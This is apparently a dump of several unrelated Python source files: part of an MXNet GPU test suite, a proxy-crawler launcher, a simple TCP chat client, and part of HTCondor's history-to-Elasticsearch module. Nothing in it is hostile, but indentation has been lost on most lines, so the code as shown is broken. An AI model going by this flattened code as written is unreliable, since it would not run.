'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), stride=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Dilate > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 18, 3, 3),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
]
sym = mx.sym.contrib.DeformableConvolution(num_filter=3, kernel=(3,3), dilate=(2,2), name='deformable_conv')
check_consistency(sym, ctx_list, scale=0.1, tol=tol)
# Deformable group > 1
# since atomicAdd does not support fp16 (which deformable conv uses in backward), we do not test fp16 here
ctx_list = [{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float64, 'deformable_conv_offset': np.float64}},
{'ctx': mx.gpu(0),
'deformable_conv_data': (2, 2, 7, 7),
'deformable_conv_offset': (2, 36, 5, 5),
'type_dict': {'deformable_conv_data': np.float32, 'deformable_conv_offset': np.float32}},
# {'ctx': mx.gpu(0),
# 'deformable_conv_data': (2, 2, 7, 7),
# 'deformable_conv_offset': (2, 36, 5, 5),
# 'type_dict': {'deformable_conv_data': np.float16, 'deformable_offset': np.float16}},
]
    sym = mx.sym.contrib.DeformableConvolution(num_filter=4, kernel=(3,3), num_deformable_group=2,
                                               name='deformable_conv')
    check_consistency(sym, ctx_list, scale=0.1, tol=tol)
@with_seed()
@assert_raises_cudnn_disabled()
def test_residual_fused():
cell = mx.rnn.ResidualCell(
mx.rnn.FusedRNNCell(50, num_layers=3, mode='lstm',
prefix='rnn_', dropout=0.5))
inputs = [mx.sym.Variable('rnn_t%d_data'%i) for i in range(2)]
outputs, _ = cell.unroll(2, inputs, merge_outputs=None)
assert sorted(cell.params._params.keys()) == \
['rnn_parameters']
args, outs, auxs = outputs.infer_shape(rnn_t0_data=(10, 50), rnn_t1_data=(10, 50))
assert outs == [(10, 2, 50)]
outputs = outputs.eval(ctx=mx.gpu(0),
rnn_t0_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_t1_data=mx.nd.ones((10, 50), ctx=mx.gpu(0))+5,
rnn_parameters=mx.nd.zeros((61200,), ctx=mx.gpu(0)))
expected_outputs = np.ones((10, 2, 50))+5
assert np.array_equal(outputs[0].asnumpy(), expected_outputs)
def check_rnn_layer(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
with mx.gpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = mx.nd.ones((10, 16, 30))
states = layer.begin_state(16)
co, cs = layer(x, states)
# atol of 1e-6 required, as exposed by seed 2124685726
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
def check_rnn_layer_w_rand_inputs(layer):
layer.collect_params().initialize(ctx=[mx.cpu(0), mx.gpu(0)])
x = mx.nd.uniform(shape=(10, 16, 30))
with mx.gpu(0):
x = x.copyto(mx.gpu(0))
states = layer.begin_state(16)
go, gs = layer(x, states)
with mx.cpu(0):
x = x.copyto(mx.cpu(0))
states = layer.begin_state(16)
co, cs = layer(x, states)
assert_almost_equal(go.asnumpy(), co.asnumpy(), rtol=1e-2, atol=1e-6)
for g, c in zip(gs, cs):
assert_almost_equal(g.asnumpy(), c.asnumpy(), rtol=1e-2, atol=1e-6)
@with_seed()
def test_sequence_reverse():
check_sequence_reverse(mx.gpu(0))
@with_seed()
def test_autograd_save_memory():
x = mx.nd.zeros((128, 512, 512), ctx=mx.gpu(0))
x.attach_grad()
with mx.autograd.record():
for i in range(200):
x = x + 1
x.wait_to_read()
x.backward()
@with_seed()
def test_cuda_rtc():
source = r'''
extern "C" __global__ void axpy(const float *x, float *y, float alpha) {
int i = threadIdx.x + blockIdx.x * blockDim.x;
y[i] += alpha * x[i];
}
extern "C" __global__ void saxpy(const float *x, float *y, float alpha) {
extern __shared__ float smem[];
int i = threadIdx.x + blockIdx.x * blockDim.x;
smem[threadIdx.x] = x[i];
y[i] += alpha * smem[threadIdx.x];
}
'''
module = mx.rtc.CudaModule(source)
axpy = module.get_kernel("axpy", "const float *x, float *y, float alpha")
x = mx.nd.ones((10,), ctx=mx.gpu(0))
y = mx.nd.zeros((10,), ctx=mx.gpu(0))
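    # CudaKernel.launch arguments: kernel args, context, grid dims, block dims; saxpy below also
    # passes a trailing value sizing the dynamic shared memory behind its extern __shared__ buffer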
axpy.launch([x, y, 3.0], mx.gpu(0), (1, 1, 1), (10, 1, 1))
assert (y.asnumpy() == 3).all()
saxpy = module.get_kernel("saxpy", "const float *x, float *y, float alpha")
saxpy.launch([x, y, 4.0], mx.gpu(0), (1, 1, 1), (10, 1, 1), 10)
assert (y.asnumpy() == 7).all()
saxpy.launch([x, y, 5.0], mx.gpu(0), (2, 1, 1), (5, 1, 1), 5)
assert (y.asnumpy() == 12).all()
@with_seed()
def test_cross_device_autograd():
x = mx.nd.random.uniform(shape=(10,))
x.attach_grad()
with mx.autograd.record():
y = mx.nd.tanh(x)
y = y.copyto(mx.gpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.cpu(0))
y = mx.nd.tanh(y)
y = y.copyto(mx.gpu(0))
y = y.copyto(mx.gpu(0))
y.backward()
dx = x.grad.asnumpy()
x.grad[:] = 0
with mx.autograd.record():
y = x
for i in range(3):
y = mx.nd.tanh(y)
y.backward()
assert_almost_equal(dx, x.grad.asnumpy())
@with_seed()
def test_multi_proposal_op():
    # parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
rpn_min_size = feature_stride
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
def get_new_data(batch_size, ctx):
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
dtype = np.float32
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = dtype, ctx = ctx)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = dtype, ctx = ctx)
im_info = mx.nd.empty((batch_size, 3), dtype = dtype, ctx = ctx)
cls = [1.0 * (i + 1) / cls_prob.size for i in range(cls_prob.size)]
np.random.shuffle(cls)
cls_prob = mx.nd.reshape(mx.nd.array(cls, dtype = dtype, ctx = ctx), shape = cls_prob.shape)
bbox_pred = mx.nd.array(np.random.randint(-2, 3, size = bbox_pred.shape), dtype = dtype, ctx = ctx)
for i in range(batch_size):
im_size = np.random.randint(600, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(80, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
return cls_prob, bbox_pred, im_info
def check_proposal_consistency(op, batch_size, with_nms=False):
'''
op is mx.nd.contrib.Proposal or mx.nd.contrib.MultiProposal
'''
cls_prob, bbox_pred, im_info = get_new_data(batch_size, mx.cpu(0))
rois_cpu, score_cpu = op(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
gpu_ctx = mx.gpu(0)
# copy data to gpu from cpu
cls_prob_gpu = cls_prob.as_in_context(gpu_ctx)
bbox_pred_gpu = bbox_pred.as_in_context(gpu_ctx)
im_info_gpu = im_info.as_in_context(gpu_ctx)
rois_gpu, score_gpu = op(
cls_prob = cls_prob_gpu,
bbox_pred = bbox_pred_gpu,
im_info = im_info_gpu,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = 0.7 if with_nms else 1.0,
rpn_min_size = rpn_min_size, output_score = True)
rois_cpu_np = rois_cpu.asnumpy()
rois_gpu_np = rois_gpu.asnumpy()
score_cpu_np = score_cpu.asnumpy()
score_gpu_np = score_gpu.asnumpy()
if not with_nms:
assert_almost_equal(score_cpu_np, score_gpu_np, atol = 1e-3, rtol = 1e-3)
assert_almost_equal(rois_cpu_np, rois_gpu_np, atol = 1e-3, rtol = 1e-3)
else:
            # no 100% guarantee with nms
assert(np.sum(np.abs(score_cpu_np - score_gpu_np) < 1e-3) >= 10)
assert(np.sum(np.abs(rois_cpu_np - rois_gpu_np) < 1e-3) >= 40)
check_proposal_consistency(mx.nd.contrib.Proposal, 1)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5)
check_proposal_consistency(mx.nd.contrib.Proposal, 1, with_nms=True)
check_proposal_consistency(mx.nd.contrib.MultiProposal, 5, with_nms=True)
# The following 2 functions launch 0-thread kernels, an error that should be caught and signaled.
def kernel_error_check_imperative():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
a = mx.nd.array([1,2,3],ctx=mx.gpu(0))
b = mx.nd.array([],ctx=mx.gpu(0))
c = (a / b).asnumpy()
def kernel_error_check_symbolic():
os.environ['MXNET_ENGINE_TYPE'] = 'NaiveEngine'
a = mx.sym.Variable('a')
b = mx.sym.Variable('b')
c = a / b
f = c.bind(mx.gpu(0), { 'a':mx.nd.array([1,2,3],ctx=mx.gpu(0)),
'b':mx.nd.array([],ctx=mx.gpu(0))})
f.forward()
g = f.outputs[0].asnumpy()
def test_kernel_error_checking():
# Running tests that may throw exceptions out of worker threads will stop CI testing
# if not run in a separate process (with its own address space for CUDA compatibility).
try:
mpctx = mp.get_context('spawn')
except:
print('SKIP: python%s.%s lacks the required process fork-exec support ... ' %
sys.version_info[0:2], file=sys.stderr, end='')
else:
with discard_stderr():
for f in [kernel_error_check_imperative, kernel_error_check_symbolic]:
p = mpctx.Process(target=f)
p.start()
p.join()
assert p.exitcode != 0,\
"Expected a synchronous kernel error from %s(), none seen." % f.__name__
def test_incorrect_gpu():
# Try setting dev_id to a really big number
assert_raises(MXNetError, mx.nd.ones, (2,2), ctx=mx.gpu(100001))
@with_seed()
def test_batchnorm_backwards_notrain():
for ctx in [mx.cpu(0), mx.gpu(0)]:
for cudnn_o in [False, True]:
B,C,H,W = 4,3,2,2
x = mx.nd.random.poisson(1,shape=(B,C,H,W)).as_in_context(ctx)
gamma = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
beta = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
mean = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
std = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
x.attach_grad()
with autograd.record(False):
y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(),
fix_gamma=False, cudnn_off=cudnn_o)
loss=y.square().sum()
loss.backward(train_mode=False)
@with_seed()
def test_create_sparse_ndarray_gpu_to_cpu():
dim0 = 10
dim1 = 5
densities = [0, 0.5, 1]
for density in densities:
shape = rand_shape_2d(dim0, dim1)
matrix = rand_ndarray(shape, 'row_sparse', density)
data = matrix.data
indices = matrix.indices
rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu())
assert rsp_created.stype == 'row_sparse'
assert same(rsp_created.data.asnumpy(), data.asnumpy())
assert same(rsp_created.indices.asnumpy(), indices.asnumpy())
rsp_copy = mx.nd.array(rsp_created)
assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy()))
@with_seed()
def test_softmax_activation():
gpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.gpu(0))
cpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.cpu())
cpu_a.attach_grad()
gpu_a.attach_grad()
with mx.autograd.record():
gpu_y = mx.nd.SoftmaxActivation(data = gpu_a)
cpu_y = mx.nd.SoftmaxActivation(data = cpu_a)
assert_almost_equal(cpu_y.asnumpy(), gpu_y.asnumpy(), atol = 1e-3, rtol = 1e-3)
gpu_y.backward()
cpu_y.backward()
assert_almost_equal(cpu_a.grad.asnumpy(), gpu_a.grad.asnumpy(),
atol = 1e-3, rtol = 1e-3)
def test_context_num_gpus():
# Test that num_gpus reports at least one GPU, as the test is run on a GPU host.
assert mx.context.num_gpus() > 0
if __name__ == '__main__':
import nose
nose.runmodule()
|
proxy_crawler.py
|
#! /usr/bin/python3
# rootVIII | proxy_crawler.py
from sys import exit
from threading import Thread
from crawler.crawl import ProxyCrawler, HeadlessProxyCrawler
from crawler.arguments import ArgParser
def main():
while True:
if not args.headless:
bot = ProxyCrawler(args.url, args.keyword)
else:
bot = HeadlessProxyCrawler(args.url, args.keyword)
bot.start_search()
if __name__ == "__main__":
args = ArgParser().get_args()
    if not args.url.startswith('https://'):
print('Include protocol in URL: https://')
exit(1)
try:
thread = Thread(target=main)
thread.daemon = True
thread.start()
thread.join()
except KeyboardInterrupt:
print('\nExiting\n')
|
client.py
|
import socket, threading, traceback, queue, json
from datetime import datetime
from chatapp.shared import message
class TCP_Nonblocking_Client:
def __init__(self, host, port, username, password, verbose_output=True):
self.host = host
self.port = port
self.sock = None
self.format = 'utf-8'
self.verbose_output = verbose_output
self.username = username
self.password = password
self.received_messages = queue.Queue()
def print_tstamp(self, msg):
if self.verbose_output:
            current_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
print(f'[{current_time}] [CLIENT] {msg}')
def create_socket(self):
self.print_tstamp('Creating socket...')
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.print_tstamp(f'Socket created')
def connect_to_server(self, should_signup):
        # returns (success_flag, message): True/False for whether connection and verification succeeded, plus a message to be displayed by the UI in case something goes wrong
try:
self.print_tstamp(f'Connecting to server [{self.host}] on port [{self.port}]...')
self.sock.connect((self.host, self.port))
self.print_tstamp(f'Connected to server [{self.host}] on port [{self.port}]')
if should_signup:
signup_response = self.send_signup(self.username, self.password)
self.print_tstamp('Verifying username and password with server...')
verification_response = self.send_verification(self.username, self.password)
if verification_response['success']:
self.print_tstamp('Username and password verified with server')
return True, ''
else:
self.print_tstamp('Username and/or password could not be verified by server')
self.shutdown_socket()
return False, 'Username and/or password could not be verified by server'
except socket.error:
self.print_tstamp('Encountered an error:')
traceback.print_exc()
return False, 'Encountered a socket error'
except OSError as err:
self.print_tstamp('Encountered an error:')
traceback.print_exc()
return False, 'Encountered an OSError'
def send_verification(self, username, password):
        # attempts to verify the username and password with the server; returns the server's response, or False if the response was incorrectly formatted
msg = message.create_message(message.config_msg_types['VERIFICATION_REQUEST'], username=username, password=password)
msg = json.dumps(msg)
msg = msg.encode(self.format)
self.sock.send(msg)
response = self.sock.recv(128)
response = response.decode(self.format)
response = json.loads(response)
if message.is_type(response, message.config_msg_types['VERIFICATION_RESPONSE']):
return response
return False
def send_signup(self, username, password):
        # attempts to sign up a new user with the given username and password
msg = message.create_message(message.config_msg_types['SIGNUP_REQUEST'], username=username, password=password)
msg = json.dumps(msg)
msg = msg.encode(self.format)
self.sock.send(msg)
response = self.sock.recv(128)
response = response.decode(self.format)
response = json.loads(response)
if message.is_type(response, message.config_msg_types['SIGNUP_RESPONSE']):
return response
return False
def send_message(self, msg):
try:
if msg:
msg = message.create_message(message.config_msg_types['CLIENT_TEXT'], msg_body=msg)
msg = json.dumps(msg) # convert python dict to json string
msg = msg.encode(self.format) # convert json string to utf-8 bytes
send_info = self.sock.send(msg) # send json string encoded with utf-8
self.print_tstamp(f'Sent {send_info} bytes to the server')
return True, ''
except OSError as err:
self.print_tstamp('Encountered an error:')
traceback.print_exc()
return False, 'Encountered an OSError'
def shutdown_socket(self):
self.print_tstamp('Closing socket...')
self.sock.close()
self.print_tstamp('Socket closed')
def read_message_loop(self):
        # if this function returns, an error has occurred (or the server closed the
        # connection) and interaction should be halted
        while True:
            try:
                data = self.sock.recv(1024)  # receive json string encoded with utf-8 from server
                if not data:
                    # connection closed by peer, exit loop
                    self.print_tstamp('Connection closed by server')
                    break
                msg = data.decode(self.format)  # decode msg from utf-8 bytes to json string
                msg = json.loads(msg)  # decode json string to python dict
            except socket.timeout:
                self.print_tstamp('Socket timed out, retrying receive')
                continue
            except json.JSONDecodeError:
                self.print_tstamp('Encountered a JSON decoding error:')
                traceback.print_exc()
                continue
            except OSError:
                self.print_tstamp('Encountered socket error:')
                traceback.print_exc()
                break
            self.print_tstamp(f'Received from [SERVER]: {msg}')
            self.received_messages.put(msg)
self.shutdown_socket()
self.stop_client = True
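# A minimal sketch of how a consumer (e.g. a UI loop) might drain the received_messages
# queue without blocking; handle_msg is a hypothetical callback supplied by the caller.
def drain_received_messages(client, handle_msg):
    """Pass any queued server messages to handle_msg and return once the queue is empty."""
    while True:
        try:
            msg = client.received_messages.get_nowait()
        except queue.Empty:
            return
        handle_msg(msg)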
def run_client():
try:
print('Signup then login? [y/n]')
        is_signup = input().strip().lower() == 'y'
print('Username: ')
username = input()
print('Password: ')
password = input()
tcp_client = TCP_Nonblocking_Client('localhost', 8080, username, password, True)
tcp_client.create_socket()
        connected, error_msg = tcp_client.connect_to_server(is_signup)
        if not connected:
            print(error_msg)
            return
thread = threading.Thread(target=tcp_client.read_message_loop)
thread.daemon = True
thread.start()
while True:
            user_msg = input()
            tcp_client.send_message(user_msg)
except KeyboardInterrupt:
pass
if __name__ == '__main__':
run_client()
|
history.py
|
# Copyright 2021 HTCondor Team, Computer Sciences Department,
# University of Wisconsin-Madison, WI.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import time
import logging
import datetime
import traceback
import multiprocessing
import htcondor
import elasticsearch
from . import elastic, utils, convert
_LAUNCH_TIME = int(time.time())
# Lower the volume on third-party packages
for k in logging.Logger.manager.loggerDict:
logging.getLogger(k).setLevel(logging.WARNING)
def process_custom_ads(start_time, job_ad_file, args, metadata=None):
"""
    Given a file of job ads, process its entire history.
"""
logging.info(f"Start processing the adfile: {job_ad_file}")
my_start = time.time()
buffered_ads = {}
count = 0
total_upload = 0
if not args.read_only:
es = elastic.get_server_handle(args)
try:
for job_ad in utils.parse_history_ad_file(job_ad_file):
metadata = metadata or {}
metadata["condor_history_source"] = "custom"
metadata["condor_history_runtime"] = int(my_start)
metadata["condor_history_host_version"] = job_ad.get("CondorVersion", "UNKNOWN")
metadata["condor_history_host_platform"] = job_ad.get(
"CondorPlatform", "UNKNOWN"
)
metadata["condor_history_host_machine"] = job_ad.get("Machine", "UNKNOWN")
metadata["condor_history_host_name"] = job_ad.get("Name", "UNKNOWN")
try:
dict_ad = convert.to_json(job_ad, return_dict=True)
except Exception as e:
message = f"Failure when converting document in {job_ad_file}: {e}"
exc = traceback.format_exc()
message += f"\n{exc}"
logging.warning(message)
continue
idx = elastic.get_index(args.es_index_name)
ad_list = buffered_ads.setdefault(idx, [])
ad_list.append((convert.unique_doc_id(dict_ad), dict_ad))
if len(ad_list) == args.es_bunch_size:
st = time.time()
if not args.read_only:
elastic.post_ads(
es.handle, idx, ad_list, metadata=metadata
)
logging.debug(
f"Posting {len(ad_list)} ads from {job_ad_file}"
)
total_upload += time.time() - st
buffered_ads[idx] = []
count += 1
except Exception:
message = f"Failure when processing history from {job_ad_file}"
logging.exception(message)
return
# Post the remaining ads
for idx, ad_list in list(buffered_ads.items()):
if ad_list:
logging.debug(
f"Posting remaining {len(ad_list)} ads from {job_ad_file}"
)
if not args.read_only:
elastic.post_ads(es.handle, idx, ad_list, metadata=metadata)
total_time = (time.time() - my_start) / 60.0
total_upload /= 60.0
logging.info(
f"{job_ad_file} history: response count: {count}; upload time {total_upload:.2f} min"
)
return
def process_schedd(start_time, since, checkpoint_queue, schedd_ad, args, metadata=None):
"""
    Given a schedd, process its entire history since the last checkpoint.
"""
logging.info(f"Start processing the scheduler: {schedd_ad['Name']}")
my_start = time.time()
metadata = metadata or {}
metadata["condor_history_source"] = "schedd"
metadata["condor_history_runtime"] = int(my_start)
metadata["condor_history_host_version"] = schedd_ad.get("CondorVersion", "UNKNOWN")
metadata["condor_history_host_platform"] = schedd_ad.get(
"CondorPlatform", "UNKNOWN"
)
metadata["condor_history_host_machine"] = schedd_ad.get("Machine", "UNKNOWN")
metadata["condor_history_host_name"] = schedd_ad.get("Name", "UNKNOWN")
last_completion = since["EnteredCurrentStatus"]
since_str = (
f"""(ClusterId == {since['ClusterId']}) && (ProcId == {since['ProcId']})"""
)
schedd = htcondor.Schedd(schedd_ad)
max_ads = args.schedd_history_max_ads # specify number of history entries to read
if max_ads > 10000:
logging.debug(f"Please note that the maximum number of queries per scheduler is also limited by the scheduler's config (HISTORY_HELPER_MAX_HISTORY).")
logging.info(f"Note that a too large number of schedd_history_max_ads can cause condor_adstash to break!")
logging.info(f"Querying {schedd_ad['Name']} for history ads since: {since_str}")
buffered_ads = {}
count = 0
total_upload = 0
timed_out = False
if not args.read_only:
es = elastic.get_server_handle(args)
try:
if not args.dry_run:
history_iter = schedd.history(
constraint="true",
projection=[],
match=max_ads, # default=10000
since=since_str
)
else:
history_iter = []
for job_ad in history_iter:
try:
dict_ad = convert.to_json(job_ad, return_dict=True)
except Exception as e:
message = f"Failure when converting document on {schedd_ad['Name']} history: {e}"
exc = traceback.format_exc()
message += f"\n{exc}"
logging.warning(message)
continue
idx = elastic.get_index(args.es_index_name)
ad_list = buffered_ads.setdefault(idx, [])
ad_list.append((convert.unique_doc_id(dict_ad), dict_ad))
if len(ad_list) == args.es_bunch_size:
st = time.time()
if not args.read_only:
elastic.post_ads(
es.handle, idx, ad_list, metadata=metadata
)
logging.debug(
f"Posting {len(ad_list)} ads from {schedd_ad['Name']} (process_schedd)"
)
total_upload += time.time() - st
buffered_ads[idx] = []
count += 1
# Find the most recent job and use its job id as the since parameter
job_completion = convert.record_time(job_ad, fallback_to_launch=False)
if job_completion > last_completion:
last_completion = job_completion
since = {
"ClusterId": job_ad.get("ClusterId", 0),
"ProcId": job_ad.get("ProcId", 0),
"EnteredCurrentStatus": job_completion,
}
if utils.time_remaining(my_start, args.schedd_history_timeout) <= 0:
message = f"History crawler on {schedd_ad['Name']} has been running for more than {args.schedd_history_timeout} seconds; pushing last ads and exiting."
logging.error(message)
timed_out = True
break
except RuntimeError:
message = f"Failed to query schedd {schedd_ad['Name']} for job history"
logging.exception(message)
return since
except Exception:
message = f"Failure when processing schedd history query on {schedd_ad['Name']}"
logging.exception(message)
return since
# Post the remaining ads
for idx, ad_list in list(buffered_ads.items()):
if ad_list:
logging.debug(
f"Posting remaining {len(ad_list)} ads from {schedd_ad['Name']} (process_schedd)"
)
if not args.read_only:
elastic.post_ads(es.handle, idx, ad_list, metadata=metadata)
total_time = (time.time() - my_start) / 60.0
total_upload /= 60.0
last_formatted = datetime.datetime.fromtimestamp(last_completion).strftime(
"%Y-%m-%d %H:%M:%S"
)
logging.info(
f"Schedd {schedd_ad['Name']} history: response count: {count}; last job {last_formatted}; query time {total_time - total_upload:.2f} min; upload time {total_upload:.2f} min"
)
if count >= max_ads:
logging.warning(
f"Max ads ({max_ads}) was reached "
f"for {schedd_ad['Name']}, older history may be missing!"
)
# If we got to this point without a timeout, all these jobs have
# been processed and uploaded, so we can update the checkpoint
if not timed_out:
checkpoint_queue.put((schedd_ad["Name"], since))
return since
def process_startd(start_time, since, checkpoint_queue, startd_ad, args, metadata=None):
"""
Given a startd, process its entire set of history since last checkpoint.
"""
my_start = time.time()
metadata = metadata or {}
metadata["condor_history_source"] = "startd"
metadata["condor_history_runtime"] = int(my_start)
metadata["condor_history_host_version"] = startd_ad.get("CondorVersion", "UNKNOWN")
metadata["condor_history_host_platform"] = startd_ad.get(
"CondorPlatform", "UNKNOWN"
)
metadata["condor_history_host_machine"] = startd_ad.get("Machine", "UNKNOWN")
metadata["condor_history_host_name"] = startd_ad.get("Name", "UNKNOWN")
last_completion = since["EnteredCurrentStatus"]
since_str = f"""(GlobalJobId == "{since['GlobalJobId']}") && (EnteredCurrentStatus == {since['EnteredCurrentStatus']})"""
max_ads = args.startd_history_max_ads # specify number of history entries to read
if max_ads > 10000:
logging.debug(f"Please note that the maximum number of queries per scheduler is also limited by the scheduler's config (HISTORY_HELPER_MAX_HISTORY).")
logging.info(f"Note that a too large number of startd_history_max_ads can cause condor_adstash to break!")
startd = htcondor.Startd(startd_ad)
logging.info(f"Querying {startd_ad['Machine']} for history since: {since_str}")
buffered_ads = {}
count = 0
total_upload = 0
timed_out = False
if not args.read_only:
es = elastic.get_server_handle(args)
try:
if not args.dry_run:
history_iter = startd.history(
requirements="true",
projection=[],
match=max_ads, # default=10000
since=since_str
)
else:
history_iter = []
for job_ad in history_iter:
try:
dict_ad = convert.to_json(job_ad, return_dict=True)
except Exception as e:
message = f"Failure when converting document on {startd_ad['Machine']} history: {e}"
exc = traceback.format_exc()
message += f"\n{exc}"
logging.warning(message)
continue
idx = elastic.get_index(args.es_index_name)
ad_list = buffered_ads.setdefault(idx, [])
ad_list.append((convert.unique_doc_id(dict_ad), dict_ad))
if len(ad_list) == args.es_bunch_size:
st = time.time()
if not args.read_only:
elastic.post_ads(
es.handle, idx, ad_list, metadata=metadata
)
logging.debug(
f"Posting {len(ad_list)} ads from {startd_ad['Machine']} (process_startd)"
)
total_upload += time.time() - st
buffered_ads[idx] = []
count += 1
            job_completion = job_ad.get("EnteredCurrentStatus", 0)
if job_completion > last_completion:
last_completion = job_completion
since = {
"GlobalJobId": job_ad.get("GlobalJobId"),
"EnteredCurrentStatus": job_ad.get("EnteredCurrentStatus"),
}
if utils.time_remaining(my_start, args.startd_history_timeout) <= 0:
message = f"History crawler on {startd_ad['Machine']} has been running for more than {args.schedd_history_timeout} seconds; pushing last ads and exiting."
logging.error(message)
timed_out = True
break
except RuntimeError:
message = f"Failed to query startd {startd_ad['Machine']} for job history"
logging.exception(message)
return since
except Exception:
message = f"Failure when processing startd history query on {startd_ad['Machine']}"
logging.exception(message)
return since
# Post the remaining ads
for idx, ad_list in list(buffered_ads.items()):
if ad_list:
logging.debug(
f"Posting remaining {len(ad_list)} ads from {startd_ad['Machine']} (process_startd)"
)
if not args.read_only:
elastic.post_ads(es.handle, idx, ad_list, metadata=metadata)
total_time = (time.time() - my_start) / 60.0
total_upload /= 60.0
last_formatted = datetime.datetime.fromtimestamp(last_completion).strftime(
"%Y-%m-%d %H:%M:%S"
)
logging.info(
f"Startd {startd_ad['Machine']} history: response count: {count}; last job {last_formatted}; query time {total_time - total_upload:.2f} min; upload time {total_upload:.2f} min"
)
if count >= max_ads:
logging.warning(
f"Max ads ({max_ads}) was reached "
f"for {startd_ad['Machine']}, some history may be missing!"
)
# If we got to this point without a timeout, all these jobs have
# been processed and uploaded, so we can update the checkpoint
if not timed_out:
checkpoint_queue.put((startd_ad["Machine"], since))
return since
def load_checkpoint(checkpoint_file):
try:
with open(checkpoint_file, "r") as fd:
checkpoint = json.load(fd)
except IOError:
checkpoint = {}
return checkpoint
def update_checkpoint(checkpoint_file, name, since):
checkpoint = load_checkpoint(checkpoint_file)
checkpoint[name] = since
with open(checkpoint_file, "w") as fd:
json.dump(checkpoint, fd, indent=4)
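# For reference, the checkpoint file written above is a JSON object keyed by the
# daemon name (schedds) or machine (startds), each entry holding the "since" marker
# used for the next history query. A purely illustrative example (host names and
# IDs are hypothetical):
#
#   {
#       "schedd01.example.org": {"ClusterId": 1234, "ProcId": 0, "EnteredCurrentStatus": 1700000000},
#       "exec01.example.org": {"GlobalJobId": "schedd01.example.org#1234.0#1699999000", "EnteredCurrentStatus": 1700000500}
#   }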
def process_histories(
schedd_ads=[], startd_ads=[], starttime=None, pool=None, args=None, metadata=None
):
"""
    Process the history of each given schedd and startd ad using the
    provided multiprocessing pool.
"""
checkpoint = load_checkpoint(args.checkpoint_file)
timeout = 2 * 60
futures = []
metadata = metadata or {}
metadata["es_push_source"] = "condor_history"
manager = multiprocessing.Manager()
checkpoint_queue = manager.Queue()
if len(schedd_ads) > 0:
timeout = args.schedd_history_timeout
for schedd_ad in schedd_ads:
name = schedd_ad["Name"]
# Check for last completion time
# If there was no previous completion, get full history
since = checkpoint.get(
name, {"ClusterId": 0, "ProcId": 0, "EnteredCurrentStatus": 0}
)
future = pool.apply_async(
process_schedd,
(starttime, since, checkpoint_queue, schedd_ad, args, metadata),
)
futures.append((name, future))
if len(startd_ads) > 0:
timeout = args.startd_history_timeout
for startd_ad in startd_ads:
machine = startd_ad["Machine"]
# Check for last completion time ("since")
since = checkpoint.get(
